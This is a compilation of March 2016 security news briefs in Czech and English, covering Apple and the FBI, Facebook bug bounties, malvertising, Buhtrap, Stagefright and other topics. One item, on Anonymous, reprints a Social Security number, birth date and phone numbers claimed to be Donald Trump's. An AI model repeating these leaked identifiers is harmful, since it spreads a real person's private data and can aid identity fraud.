Bojí se především toho, že se budou nároky stupňovat. „Pro příklad, jednou po nás FBI bude chtít, abychom zpřístupnili fotoaparát v telefonu či mikrofon. To jsou věci, které teď dělat prostě nemůžeme,“ vysvětlil viceprezident Applu, co by mohlo přinést rozhodnutí soudu.
Celý spor se rozhořel kvůli tomu, že se vyšetřovatelům z FBI nepodařilo dostat do uzamčeného iPhonu islámského radikála. Ten měl svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal.
Nejde jen o zabijákův iPhone
Právě kvůli neúspěchu vyšetřovatelů soud společnosti Apple nařídil, aby tuto funkci vypnula. Vedení amerického počítačového gigantu to však odmítlo s tím, že to technicky není možné. Jedinou cestou, jak iPhone zpřístupnit, je údajně vytvoření „zadních vrátek“ do operačního systému iOS. Ten využívají právě chytré telefony iPhone a počítačové tablety iPad.
To ale šéf Applu Tim Cook odmítá, protože se bojí případného zneužití. Implementací takového nástroje do zmiňované mobilní platformy by totiž byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti.
Na začátku března se totiž ukázalo, že FBI nejde pouze o zabijákův iPhone. Jen od loňského října chtěla odemknout celkem devět zařízení. [celá zpráva]
FBI chce zdrojový kód systému
FBI se nyní snaží prostřednictvím soudu vedení Applu donutit, aby „začalo spolupracovat“. V opačném případě chtějí dosáhnout vyšetřovatelé toho, aby jim musel americký počítačový gigant vydat kompletní zdrojový kód systému. S jeho pomocí by se totiž patrně také do zabijákova iPhonu dostali.
Cook se kvůli celému sporu dokonce již obrátil na prezidenta USA Baracka Obamu. S jeho pomocí by se chtěl snažit prosadit vytvoření speciálního výboru, který by se problematikou šifrování mobilů zabýval.
Na jeho žádost však úřady zatím neodpověděly. Není tedy jasné, zda Cooka Obama přijme.
Ever Wondered How Facebook Decides — How much Bounty Should be Paid?
18.3.2016 Social Site
Facebook pays Millions of dollars every year to researchers and white hat hackers from all around the world to stamp out security holes in its products and infrastructure under its Bug Bounty Program.
Facebook recognizes and rewards bug hunters to encourage more people to help the company keep Facebook users safe and secure from outside entities, malicious hackers or others.
Recently, the social media giant revealed that India is on top of all countries to report the maximum number of vulnerabilities or security holes in the Facebook platform as well as holds the top position in the country receiving the most bug bounties paid.
"India is home to the largest population of security researchers participating in the Facebook bug bounty program since its inception in 2011. The country also holds the top spot for most bounties paid," Adam Ruddermann, Facebook’s technical program manager notes.
If you are one of the Facebook’s bug hunters, you might be aware of the fact that reporting same type of flaw (say, Cross-site Scripting or XSS) in Facebook would not make one eligible for the same bounty.
Do you ever wondered why? And How Facebook decides the Bounty amount?
Well, the procedure exactly works in the same way The Hacker News team decides which news to be covered first and which is not at all i.e. based on the risks to the end-users.
Recently, Facebook’s bug bounty team explained how they calculate bounties.
How Facebook Calculates Bug Bounties?
Facebook calculates bounties, of course, based on Risk to end-users. The company offers a maximum reward of USD$20,000 and a minimum of USD$500.
The bugs that allow someone to access private Facebook data, delete Facebook data, modify an account and run JavaScript under facebook.com are considered as high-impact vulnerabilities that directly affects end users, so are maximum paid bugs.
"The security community in India is strong and growing every day," Facebook says. "India has long topped the list of 127 countries whose researchers contribute to our bug bounty program."
Here’s the Procedure Facebook Security team follows:
Step 1: The Facebook Bug Bounty team first looks at the potential impact of a vulnerability reported.
Step 2: Engineers at Facebook then calculates the difficulty or easiness of exploiting a particular vulnerability, whether it’s high-severity, as well as the kind of resources or technical skills a successful attack would require.
Step 3: The team then looks at whether any existing features can already mitigate the issue, for example, an implementation of rate-limiting mechanism to prevent brute-force attacks.
Step 4: Sometimes bug hunters report bugs that are actually Facebook features designed to provide users a better experience on the social media platform. These reports are less considered as eligible until they pose any threat.
Based upon the aforementioned steps, Facebook decides a base payout for each eligible vulnerability report.
The bounty amount can change as the risk landscape evolves, like a bug that leads to more bugs get bigger payouts.
The team also reserves an option to award security researchers and white hat hackers more than the base amount if the report itself demonstrates a high level of clarity, sophistication, and detail.
Example — Bug Bounties Paid by Facebook
facebook-bug
Earlier this month, Anand Prakash, 22, of India was awarded $15,000 (roughly Rs. 10 Lakhs) for reporting a Password Reset Vulnerability that could allow attackers to hack any Facebook account by resetting its password via endless brute force of a 6-digit code.
Have you ever wish to delete any photo from Facebook that you didn't like but posted by someone else? Believe me — It was possible, but until last year, when two independent India security researchers reported two separate vulnerabilities to Facebook and awarded $12,500 each.
Do you know what’s the highest bug bounty ever paid by Facebook? That’s $33,500 to a Brazilian hacker who managed to hack into the Facebook server using a remote-code execution vulnerability.
There was another interesting bug in Facebook that received the highest attention, but no bounty was paid.
Yes, I am talking about Palestinian Hacker, 'Khalil Shreateh', who posted vulnerability details on Facebook CEO Mark Zuckerberg’s wall to prove his point, after Facebook Security Team failed to recognize his critical vulnerability thrice.
Unfortunately, Khalil did not receive any bounty for not following the disclosure guidelines correctly and failed to clarify the vulnerability details to Facebook Security Team.
Do you want to know how to earn high bounties? Find and Report high-severity bugs.
"The most important factor for getting the maximum bounty possible is to focus on high-risk vulnerabilities, specifically those with widespread impact," Facebook says. "So, if you're looking to maximize your bounties, focus on quality over quantity."
Bug Bounty programs have widely been used by a large number of prominent technology companies including Google, Facebook and PayPal, for which Bug hunters play a vital role in security their users’ online accounts.
Bug bounties and disclosure programs encourage researchers and hackers to report responsibly vulnerabilities to the affected companies rather than exploiting them to compromise its users’ security, which may also affect company's reputation.
Anonymous claims they Hacked Donald Trump ...Really?
18.3.2016 Hacking
The 'Hacktivist' collective group Anonymous claimed to have leaked personal details of the controversial US presidential candidate Donald Trump, including his Mobile Phone Number and Social Security Number (SSN).
Donald Trump
SSN: 086-38-5955
DOB: 06/14/1946
Phone Number: 212-832-2000
Cell/Mobile Phone Number: (917) 756-8000
The hacktivist group has declared war against Trump under a campaign with the hashtag #OpWhiteRose.
The White Rose Society was a non-violent resistance group in Nazi, Germany and was known for its anti-Nazi pamphlets and graffiti during World War II.
Anonymous posted a YouTube video Thursday afternoon in which a man in a Guy Fawkes mask says:
"Donald Trump has set his ambitions on the White House in order to promote an agenda of fascism and xenophobia as well as the religious persecution of Muslims through totalitarian policies.
He has proposed targeting family members of suspected terrorists for assassination, even while acknowledging they are innocent. It would only lead to more violence from those whose families were killed by the Trump regime.
Donald Trump is an enemy of the constitution and the natural rights it enshrines. We call on all of you and millions of others to take action against Donald Trump."
The hacker collective group also released what it claimed was Trump's personal details, including cell phone number and Social Security number.
Besides his personal details, the group also released Trump’s public information including his birth date, children’s names, and company address in addition to the identities of his agent and lawyer.
However, most of the information provided by Anonymous has been circulating on the Internet since at least late last year, including his New York cell phone number and an address on 5th Avenue in Manhattan.
In response to the video, Trump's campaign has issued the following statement:
"The government and law enforcement authorities are seeking the arrest of the people responsible for attempting to illegally hack Mr. Trump's accounts and telephone information."
Soon after posting the video, Anonymous issued a follow-up tweet, saying "Seems to be outdated information, take it with a grain of salt."
This is not the first time the group has declared war against Trump. Last December, Anonymous declared war against Trump following his radical speech stating he wanted to ban Muslims from entering the United States.
Malvertising Campaign Hits Top Websites to Spread Ransomware
18.3.2016 Virus
Malvertising Campaign Hits Top Websites to Spread Ransomware
Hackers are always in search for an elite method to create loopholes in the cyberspace to implement the dark rules in the form of vulnerability exploitation.
Top Trustworthy sites such as The New York Times, BBC, MSN, AOL and many more are on the verge of losing their face value as a malwertized advertisement campaign are looming around the websites, according to SpiderLabs.
Here's what Happens to Users when Clicking Ads on these Big Brand Sites:
The advertisements on the legit sites trick users into clicking on it, making them believe that these circulated ads come from a trusted networks.
Once clicked, the malicious Ad redirects the user to a malicious website that hosts Angler Exploit Kit (AEK) to infect visitors by installing malware and ransomware on their computer.
Angler Exploit Kit includes many malicious hacking tools and zero-day exploits that let hackers execute drive-by attacks on visitors' computers.
In this case, the Angler kit scans for the vulnerable PCs and loads Bedep Trojan and TeslaCrypt Ransomware, opening doors for hackers to further install a variety of malicious programs.
Buying Media-Related Domains to Spread Malicious Campaigns
While conducting the background check, the security firm discovered that cyber criminals behind this advertising campaign made use of an expired website domain of Brentsmedia, an online marketing solution who discontinued their service earlier 2016.
According to the web registrar records, Brentsmedia's domain was purchased by Pavel G Ashtahov on March 6th, the day just before the malvertising campaign kickstarted.
Malvertising Campaign Hits Top Websites Worldwide to Spread Ransomware
Detailed analysis of this mischievous Ad campaign revealed that when a user tends to click on the malwertized Ad, it triggers a JSON file (Javascript Object Notation), which contains a list of security products for cross checking their presence in the victim's system.
If any of the pre-defined products found installed, the malvertising Ads avoid loading the malicious payload to evade the detection by antivirus firms that could block the campaign if detected.
But if not present, it will carry out the exploitation in a stealth mode, ultimately redirecting the user to the malicious page.
The Intensity of the Malvertising!
According to the researchers telemetry, these malicious Ads were delivered through two affiliate networks namely Adnxs, which has already resolved the issue, and Taggify, which has not paid any attention to the seriousness of the problem.
Two more expired media-related domains exhibiting the same characteristics as brentsmedia[.]com: "envangmedia[.]com" and "markets.shangjiamedia[.]com", shows that another similarly named domain has already been registered.
So there might be a possibility of hijacking "media" related branded domains for running malvertising campaigns, as a new generation threat to the global leaders.
Buhtrap group stole tens of millions of dollars from Russian banks
18.3.2016 Incindent
From August 2015 to February 2016 Buhtrap group managed to conduct 13 successful attacks against Russian banks for a total amount of $25.7 mln.
Since August of 2015, the Buhtrap group has conducted 13 successful attacks against financial institutions stealing more than ₽1.86 billion RUB ($27.4M USD). In April 2015, ESET discovered a malware campaign dubbed Operation Buhtrap, a conjunction of the Russian word for accountant “Buhgalter” and the English word “trap”. So far Buhtrap has not been seen anywhere else in the wild, 88 percent of targets have been in Russia and ten percent in Ukraine. Analysts have also likened the campaign to the Anunak/Carbanak campaign, which also targeted Russian and Ukrainian Banks.
The modus operandi of these particular cybercriminals is usually associated with targeted attacks rather than cyber fraud, which make this move to financial crime unusual and effective.
In the last wave of, the attackers hit Russian banks by pretending to be FinCERT, a center established by the Russian Central Bank for dealing with cyber-attacks in Russia’s financial sector.
According to a report released by the security firm Group-IB, Buhtrap has been active since 2014, despite their first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks, below the timeline of the attacks published by Group-IB:
The Buhtrap timeline is a sequence of successful attacks, in August 2015 the hackers stole ₽25.6 million RUB ($375,617 USD), two months later a new campaign resulted in the losses of ₽99 million RUB ($1.4 million USD).
In November 2015, the group raked ₽75 million RUB ($1.1 million USD) with two distinct campaigns against two banks. In December the group reached a peak in its activity targeting 5 banks and taking down ₽571 million RUB ($8.3 million USD). They also conducted two successful attacks in January and two more a month later. In all, the group has stolen ₽1.86 billion RUB ($27.4M USD) from banks in Russia
The activities continued in January and February stealing dozen million dollars from banks in Russia.
In February 2016, a developer for Buhtrap leaked the complete source code for the malware used by the group because he wasn’t paid by the gang. Experts who have analyzed it discovered that the code is related to an earlier revision and not to the one used in the recent attacks.
“Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks.” states the report.
“In many respects, this group’s activity has led to the current situation where attacks against Russian banks causing direct losses in the hundreds of millions of rubles are no longer taken as something unusual,”
The tactic used by the Buhtrap group is consolidated, the hackers register typo domains or domains that are familiar to the victim, and from there they rent servers where mail servers were set up to send phishing emails on behalf of the legitimate company avoiding being filtered as spam.
The group used a custom malware which is able to detect security software and other defensive solutions. The malware uses to track every banking operation made by the victims, the malicious code notice these operations, it downloads a legitimate remote access tool (LiteManager) which is used to carry on fraudulent transfer orders.
What to expect in the next months?
The experts have no doubt, the group will continue its activity, likely improving its TTPs, researchers at Group-IB fears that the public availability of the gang’s malware may trigger the number of campaigns against banks conducted by other criminal organizations.
“The published source codes are active. Their wide distribution may trigger the increase in the number of attacks using this malware conducted by other groups. The builder interface is presented below.” states the report.
Let me suggest to give a look at the interesting report published by Group-IB, it is full of precious information on the Buhtrap group, including indicators of compromise.
DB of the Kinoptic iOS app abandoned online with 198,000 records
18.3.2016 iOS
Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.
The security researcher Chris Vickery has discovered a database belonging to an abandoned iOS app, the Kinoptic iOS app, that is exposing on the Internet personal details of over 198,000 users.
The Kinoptic iOS app allowed Apple users to create cinematic slideshows of their photos, animate smaller portions of one picture and, of course, to share it through social media platforms.
“Kinotopic allows you to create, share, and store short video moments and make them more expressive – in the form of animated pictures and cinemagraphs.” states the app description.
The Kinoptic iOS app was present on the official App store from 2012 to 2015, its website was closed early 2016.
Chris Vickery is popular for its researches on Intente-exposed MongoDB databases, he discovered archives exposing the personal details of hundred millions U.S. voters and recently a misconfigured MongoDB installation behind a Microsoft’s career portal that exposed visitors to attacks.
Vickery explained confirmed that the database behind the Kinoptic iOS app remained online, despite the application was removed from the official Apple store.the disconcerting aspect of the story is that the developers of the Kinoptic iOS app abandoned their service, leaving the data exposed on the Internet … a present for crooks that could use them to target the unaware users.
The data is available without authentication and includes usernames, email addresses, and hashed passwords, along with other details stored in profiles managed by the Kinoptic iOS app.
Vickery tried to report the issue to both Kinoptic developers and Apple. The Kinoptic team has never replied to the expert, meanwhile the Apple’s reply was:
“Chris, if you believe that this issue affects the security of an iOS device or the iTunes Store, you may report it to product-security@apple.com. […]
On the other hand, if this security issue only affects the application itself, I’m afraid you will need to continue getting in touch with the app developer for assistance.”
This means that the data will continue to stay online until the server or the database is shut down.
Of course, if you have used in the past the Kinoptic app you need to change the password as soon as possible.
New Android Gmobi adware found in firmware and popular apps
18.3.2016 Android
Malware researchers at the Dr Web firm have found an Android malware named Gmobi specifically designed to spread as a software development kit (SDK).
Malware researchers at security firm Dr.Web have detected a new strain of malware that was specifically designed to spread as a software development kit (SDK) used by software developers and mobile device manufacturers. The malware, named Android.Gmobi.1, has been found in several legitimate applications developed by well-known companies, as well as in firmware for nearly 40 mobile devices.
“This Trojan, which was named Android.Gmobi.1, is designed as a specialized program package (the SDK platform) usually used either by mobile device manufacturers or by software developers to expand functionality of Android applications. In particular, this module is able to remotely update the operating system, collect information, display notifications (including advertising ones), and make mobile payments.” states the analysis published by the company.
The malware acts as an information stealer, it collects user and device data and send them back to the C&C server. Gmobi collects user emails, device info, roaming availability status, GPS or mobile network coordinates, whether the Google Play app that installed on the device.
Gmobi collects the following information and sends it to the C&C server: user emails, device info, roaming availability status, device location and mobile network coordinates, whether the presence of a Google Play application on the device.
The malware belongs to the adware category, once the C&C server has received the data from the device it can instruct the Gmobi in showing ads in specific positions of the device. The bad news is that operators behind Gmobi can also instruct the malware to download and install malicious APK files using a standard system dialog.
The experts highlighted that the Gmobi adware can install the APK files in a covert way only if the malware has the necessary privileges.
The server replies with an encrypted JSON (Java Script Object Notification) object that can contain the following commands:
Update the database with information about the advertisement to display.
Create an advertising shortcut on the home screen.
Display an advertising notification.
Display a notification tapping which will result in launch of an installed application.
Automatically download and install APK files using a standard system dialog. A covert installation of these files is performed only if the Trojan has necessary privileges.
The researchers have detected Gmobi in Trend Micro’s Dr. Safety and Dr. Booster apps, and the ASUS WebStorage apps. The Gmobi variant that was discovered in the software of the Trend Micro firm only collected information from the Android devices and sent it to a remote server.
Dr.Web reported the issue to all the impacted companies, Trend Micro has promptly released a new version of the infected apps.
“If your device’s firmware is infected by this Trojan, the malware cannot be removed by the anti-virus without root privileges. However, even if root privileges are gained, there is a high risk of making the device non-operational because the Trojan can be incorporated into some critical system application. Therefore, the safest solution for victims ofAndroid.Gmobi.1 is to contact the manufacturer of the device and ask them to release a firmware update without the Trojan.” concludes Dr Web.
Microsoft dá sbohem šifře RC4, která chránila HTTPS a Wi-Fi
18.3.2016 Zabezpečení
Microsoft oznámil , že v dohledné době výchozím odstraní podporu pro RC4 ve svých internetových prohlížečích Edge a Internet Explorer (11). Jde o algoritmus, který se využívá například při šifrovaném přenosu u webových stránek či při zabezpečení bezdrátových sítí. Historie šifry RC4 sahá ještě do roku 1987.
RC4
Šifra široce používaná u běžně používaných protokolů SSL/TLS pro HTTPS nebo WEP a WPA u Wi-Fi sítí. Byla oblíbená pro svou rychlost, jednoduchost a snadnou implementaci. Aktuálně už je ale překonána modernějšími alternativami.
Změna se odehraje v rámci kumulativních bezpečnostních aktualizací, které budou vydány příští měsíc, konkrétně 12. dubna (čili společně s dalšími bezpečnostními záplatami pro jiné produkty).
Microsoft tím plní závazek, o kterém informoval ještě loni. Zároveň následuje konkurenční produkty jako Google Chrome, Mozilla Firefox nebo Opera. Tyto prohlížeče již podporu RC4 zakázaly v předchozích aktualizacích.
Jelikož se většina moderních webových služeb i prohlížečů od RC4 už odklonila, v principu se běžní uživatelé nemusí při surfování na zabezpečených webech obávat nějakého omezení.
FBI varuje – chytrá auta se mohou lehce stát cílem hackerů
18.3.2016 Hacking
Odpojené brzdy, vypnutá světla nebo zaseklý plyn. Noční můry řidičů už nemusí mít na svědomí jen únava materiálu, ale i hackeři.
Hacknutý firemní systém je sice nepříjemnost, ale nemusí jít v každém případě o život. V případě hacknutého auta je to horší. Americké úřady vydaly varování před rostoucím nebezpečím útoků na kamiony nebo osobní auta prostřednictvím internetu.
„Moderní auta umožňují připojit různá zařízení, která přináší třeba ekonomičtější provoz nebo větší pohodlí za jízdy. Ale za cenu toho, že auto připojené k internet představuje větší riziko,“ tvrdí zpráva.
Podle FBI by se měli majitelé připojených aut ke svým vozidlům chovat jako k počítačům – tedy aktualizovat software a nevynechávat případné svolávání automobilkou k fyzickému záplatování objevených bezpečnostních děr. Samozřejmě se nedoporučují ani neautorizované úpravy systému nebo používání neprověřených gadgetů.
Většina tipů vyplývá z loňských zkušeností, kdy hackeři Charlie Miller a Chris Valasek hackli v červenci systém Chrysleru a pro automobilku to znamenalo svolávání 1,4 milionu aut. Jen o měsíc později vědci z University of California předvedli, jak může být jednoduše hacknuta Corvetta. A to prostřednictvím donglu, který svým klientům do aut poskytuje pojišťovna.
„V textu není moc nových informací. Navíc je to s dost velkým zpožděním. Každopádně i tak se to bude hodit. Lidé berou FBI vážně,“ tvrdí časopisu Wired hacker Chris Valasek.
Podle hackera se teď mohou úřady těšit na záplavu oznámení o hacknutí auta. Podobně se to totiž stalo loni jim. „Jsme rádi, že to po nás FBI převezme,“ dodává.
Připojená auta se stala letos jedním z větších témat i na barcelonském veletrhu MWC. Kromě Samsungu se tam s novinkou pochlubil i T-Mobile. Operátor v autech vidí především další zařízení, do kterých může zapíchnout své datové SIM karty.
Trojský kůň Marcher pro Android se šíří přes pornografické weby
18.3.2016 Mobilní
Trojan Marcher využívá zájem o pornografii a proniká do mobilů zájemců o porno, aby je připravil o peníze. Musí mu ale sami uvolnit cestu.
Jak se může do telefonu s Androidem dostat trojský kůň? Většinou tak, že si ho tam dobrovolně pořídíte – což je nakonec i případ Marcheru, který využívá pornografické weby. Uživatelům porno webu pošle odkaz na stažení aplikace e-mailem nebo v SMS. Maskuje se za aktualizaci Adobe Flash Player, která má být nutná pro přístup k žádanému pornu.
Právě vydávání se za Flash nebo aktualizaci Flashe je jednou z nejčastějších cest, jak se viry a malware dostávají i do klasického počítače. V mobilu to mají těžší – je totiž nutné povolit instalaci aplikací z jiných míst než Google Play, ale porna chtiví jedinci nejspíš i tuto překážku snadno překonají. Po instalaci získá trojan správcovská práva (uživatel mu je pochopitelně udělí) a uživateli je „poslána“ MMS s odkazem naX-Video aplikaci na Google Play – ta nic škodlivého neobsahuje, je pravděpodobně použita jenom pro vyvolání zdání realističnosti.
Trojan se poté rovnou zeptá na platební údaje a tváří se jako formulář z Google Play. V některých případech si je dokáže získat z dalších platebních aplikací, které se v telefonu mohou nacházet. Umí vytvářet i falešné přihlašovací stránky bank (použije k tomu informace o tom, jaké máte v mobilu bankovní aplikace) a je vybaven řadou dalších vychytávek.
Zscaller v Android Marcher now marching via porn sites uvádějí, že Marcher vznikl už někdy v roce 2013 a původně si vystačil pouze s imitováním Google Play pro získání platebních údajů. Později přidal vytváření falešných přihlašovacích stránek bank. Pokud vás zajímají další informace o tomto trojském koni, zkuste Android.Trojan.Marcher od PhishLabs. Při čtení narazíte i na to, že mezi napadenými zeměmi je uvedená Česká republika s 11 % podílem.
Jednu věc je vhodné zdůraznit: pokud si v Androidu nepovolíte instalaci z jiných míst než z Google Play, tak se do vašeho telefonu nemá podobný virus jak dostat.
Z Google Play obvykle nic chytit nemůžete, X-Video na Google Play nic škodlivého neobsahuje. Do telefonu (či tabletu) se „aktualizace Adobe Flash Player“ dostane jedině tak, že si stáhnete apk odněkud odjinud a poté provedete sami instalaci.
Android Stagefright Exploit, Millions devices open to 10-seconds hack
18.3.2016 Android
Millions of Android devices are open to hacking attacks due to the newly disclosed Android Stagefright Exploit that hack a smartphone in 10 seconds.
New problems for Android users, security experts at software research firm NorthBit have developed an exploit for a Stagefright vulnerability affecting Google’s operating system.
Millions of Android devices are open to hacking attacks due to the newly disclosed Android Stagefright Exploit that could allow attackers to hack a smartphone in 10 seconds.
The attacker just needs to trick users into visiting a specifically crafted web page that includes a malicious multimedia file.
The researchers at NorthBit have dubbed the Android Stagefright Exploit Metaphor, they published a detailed analysis of the attack in a paper entitled “Metaphor A (real) reallife Stagefright exploit.”
The researchers have published a proof-of-concept video that shows how they hacked an Android Nexus 5 device using their Metaphor exploit in just 10 seconds. They also demonstrated that the Android Stagefright Exploit Metaphor works against other mobile devices, including Samsung Galaxy S5, LG G3 and HTC One smartphones.
“Although the bug exists in many versions (nearly a 1,000,000,000 devices) it was claimed impractical to exploit inthewild, mainly due to the implementation of exploit mitigations in newer Android versions, specifically ASLR.” states the paper.
The Android Stagefright Exploit works on Android versions 2.2 to 4.0 and 5.0 to 5.1 while bypassing ASLR on Android versions 5.0 to 5.1, as version 2.2 to version 4.0 do not implement ASLR. Other Android versions are not affected by the new Stagefright exploit.
The Stagefright was first discovered in July 2015, experts at security firm Zimperium announced the flaw is the worst Android vulnerability flaw in the mobile OS history.
The Stagefright flaw affects a media library app that is used for by Android to process Stagefright media files. According to the experts at Zimperium the media library is affected by several vulnerabilities.
Joshua Drake from Zimperium discovered seven critical vulnerabilities in the native media playback engine called Stagefright, the expert defined the Stagefright flaw the “Mother of all Android Vulnerabilities.”
The attackers can exploit the vulnerability by sending a single multimedia text message to an unpatched Android device. Despite Google has already issued a patch and has sent out to it to the company’s partners, but most manufacturers haven’t already distributed the patch to their customers exposing them to cyber attack.
In September 2015, experts at Zimperium released a Stagefright exploit, demonstrating how to trigger the Remote Code Execution (RCE). The researchers implemented the Stagefright Exploit in python by creating an MP4 exploiting the ‘stsc’ vulnerability, aka Stagefright vulnerability.
Stagefright Exploit
In October 2015, experts at Zimperium discovered that a billion Android phones were vulnerable to new Stagefright vulnerabilities, dubbed Stagefright 2.0 that could allow attackers to execute malicious code on the targeted device.
The researchers discovered two bugs that are triggered when processing specially crafted MP3 audio or MP4 video files.
The hacking procedure described by the researchers at NorthBit is composed of the following steps:
Tricking a victim into visiting a malicious page containing a video file that crashes the media server to reset its internal state.
Once the media server restarts, the JavaScript hosted on the web page sends information about the device to the attacker’s server.
The server reply with a custom generated video file to the affected device, exploiting the Stagefright bug to reveal more info about the device’s internal state.
This information is also sent back to the attacker’s server to craft another video file that embeds a malicious payload that allows gaining the control of the mobile device.
Přes kompromitované inzertní sítě a velké weby v USA se šířil ransomware
17.3.2016 Viry
Útočné reklamy se dostaly i na ty největší a nejnavštěvovanější americké weby. Útočníci využili chyby ve Flashi, Silverlightu a dalším softwaru.
Pokud jste se v posledních dnech pohybovali na velkých a známých (zahraničních) webech, je velmi pravděpodobné, že jste se mohli setkat s reklamami, které ve skutečnosti zkoušejí, jestli se není možné dostat do vašeho počítače.
Využívají k tomu děravý Flash, Silverlight, Javu a další software v prohlížeči, u kterého jsou známé využitelné zranitelnosti. Po získání přístupu do počítače nasadí trojského koně a ransomware, který zašifruje data a za jejich odemčení požaduje zaplacení výkupného.
Nakažené reklamy se v posledních dnech objevily i v Česku – viz Podvodné reklamy straší virovou nákazou, šíří je i reklamní síť Googlu.
Trend Micro v Massive Malvertising Campaign in US Leads to Angler Exploit Kit/BEDEP uvádí, že útočícím kódem je starý známý Angler a samotná kampaň by měla cílit pouze na uživatele v USA. Výsledkem útoku je stažení backdooru známého pod názvem BEDEP a malwaru, který Trend Micro označuje jako TROJAN_AVRECON. Trustwave v Angler Takes Malvertising to New Heights informace potvrzuje a doplňuje některá další konkrétní fakta.
Zajímavé může být například to, že samotný útočný JavaScript má přes 12 tisíc řádek kódu a je samozřejmě napsán tak, aby bylo velmi obtížné zjistit, co vlastně dělá. Snaží se mimo jiné vyhýbat počítačům, které jsou chráněny některými antiviry či antimalware programy. Napadené inzertní sítě jsou, podle Trustwave, hlavně adnxs a taggify, přičemž pouze první z nich se k problému postavila čelem a nabídla rychlé řešení.
Malwarebytes v Large Angler Malvertising Campaign Hits Top Publishers doplňuje poměrně užitečný seznam webů, na kterých se útočné inzeráty objevily – zahrnuje MSN.com, NYTimes.com, BBC.com, AOL.COM či NewsWeek.com (ale i řadu dalších), které v návštěvnosti dosahují i stovky milionů návštěvníků měsíčně. Napadené inzertní sítě byly klasicky využity k tomu, že se reklamy dostaly do velkých inzertních sítí, včetně Googlu, AppNexus, AOL či Rubicon.
Malwarebytes také doplňují, že původní kit pro napadení byl RIG, teprve v neděli byl nahrazen Anglerem, do kterého byla doplněna i čerstvě objevená zranitelnost v Silverlightu.
Šifrovaný ProtonMail už je dostupný pro všechny. K dispozici jsou i aplikace pro smartphony
17.3.2016 Zabezpečení
ProtonMail vzniknul na začátku loňského roku jako výsledek zvýšené poptávky po zabezpečené komunikaci. Vývojáři, kteří mají pracovní zkušenosti ze Švýcarského CERNu, šifrují text zpráv pomocí OpenPGP a internetem tedy putuje jako nesmyslná změť znaků. Dekóduje se opět až na konci u příjemce. ProtonMail se nyní dostává z fáze beta do běžného provozu a zaregistrovat si účet může kdokoliv.
Schránka ProtonMailu vypadá na první pohled jako kterýkoliv jiný webmail. Zprávy jsou však zašifrovány jak při odesílání, tak při ukládání na server provozovatele
Registrace pro uživatele, kteří nebyli součástí beta testování se otevřela dnes ve 12.30 a zároveň s tím zamířily do App Store a Google Play aplikace pro mobilní zařízení. V blogpostu, kterým zakladatel společnosti oznámil ostrý start, zdůraznil vzrůstající poptávku po takto zabezpečené komunikaci i v souvislosti s aktuální kauzou, jež se kolem šifrování rozjela.
Na startu ProtonMailu stála úspěšná crowdfundingová kampaň, která tvůrcům přinesla 550 000 dolarů, tedy asi 13 milionů korun. Aktuálně je novým uživatelům k dispozici schránka s kapacitou 500 MB, přičemž rozšíření probíhá pomocí některého z placených účtů. Za 5 GB navíc zaplatíte 5 euro měsíčně a získáte možnost denně odeslat až 1 000 zpráv. V základní neplacené verzi je limit nastaven na 150 zpráv. Za příplatek si lze pořídit vlastní domény s několika aliasy nebo možnost třídit zprávy pomocí více štítků – v bezplatné verzi jich je 20.
Při registraci vás čeká volba běžného přihlašovacího hesla a potom druhého, s jehož pomocí jsou zprávy šifrovány. První z nich lze resetovat v případě, že k účtu přiřadíte ještě jeden běžný e-mail. Šifrovací heslo však není možné žádným způsobem obnovit a k předchozí poště se při jeho ztrátě již nedostanete.
Biohacking - Člověk 2.0
17.3.2016 Hacking
Již dnes existují nadšenci, kteří podstupují bolestivé procedury kvůli tomu, aby pomocí technologií vylepšili svoje tělo a stali se tak mnohem dokonalejšími kyborgy. Celé hnutí, jedno z odvětví takzvaného biohackingu, je zatím v počátcích.
Lidská fantazie, kreativita a nadšení pro experimenty zdánlivě neznají hranic. Na druhou stranu by také kreativita člověka měla mít jistá omezení. Na internetu se například v současnosti formuje skupina lidí, kteří experimentují s technologií neuronální stimulace mozku v domácích podmínkách.
Americká společnost Foc.us tvrdí, že vyvinula speciální headset, po jehož nasazení budou počítačoví hráči dosahovat lepších reakčních časů. Mnozí si od této techniky slibují povzbuzení nálady nebo vylepšení schopnosti učit se. Jistý vysokoškolák na YouTube otevřeně mluví o tom, že stimulační elektrody přiložil na hlavu „nějak tam a tady“. Namísto zlepšení svých schopností ale nejméně na jednu hodinu upadl do hluboké deprese – což ho však neodradilo od dalších experimentů.
Rozšíření psychických a tělesných schopností člověka, či pokusy vytvořit pomocí technologií jakéhosi dokonalého kyborga, nesou označení grinding. Dal by se zařadit jako podkategorie takzvaného biohackingu. V druhém odvětví tohoto poměrně nového směru lidé experimentují především s dědičným kódem DNA.
Amatérští biologové v domácích podmínkách „hackují“ DNA a vyvíjejí třeba nové druhy zeleniny. Stvořili už například jogurt, který ve tmě zeleně fluoreskuje, protože do jeho bílkoviny byl přidaný gen medúzy. Další větev biohackingu pak tvoří zmíněný grinding, kdy se pomocí moderních technických vymožeností hackeři snaží upravovat samotného člověka – grindeři to nazývají jako „self-biohacking“, nebo snad ještě výstižnějším termínem „ sebe-kustomizace“. Pojďme se podívat na to, na jaké hranice – etické, technologické a další – jejich kreativní experimentování naráží.
Čipová kontrola nad pacienty
Biohacking kódu DNA vyvolává ze zcela pochopitelných důvodů odpor veřejnosti. Je nasnadě, že domácí amatérské experimentování s kódem života se může vymstít. Naopak technologicky zaměřený grinding už takové emoce nevzbuzuje, protože lidé, kteří se ze sebe s pomocí techniky snaží udělat vylepšené kyborgy, zpravidla mohou ublížit jen sami sobě.
Technická zařízení, která se lidem snaží usnadnit život, pochopitelně existují již dnes – v medicíně to jsou například různé druhy protéz, kardiostimulátory a podobně. Pro diabetiky existuje pomoc v podobě nové technologie, kterou vyvíjí americká univerzita v Akronu. Tamní vědci pracují na kontaktní čočce, která měří hladinu cukru v krvi ze slz.
Podle nich potom čočka mění barvu, takže diabetik může informaci o hodnotě cukru v těle zjistit pohledem do zrcadla. Případně může oko vyfotografovat, a speciální software potom podle barvy čočky vypočítá hladinu cukru, podle níž si potom pacient zvolí příslušnou dávku inzulinu.
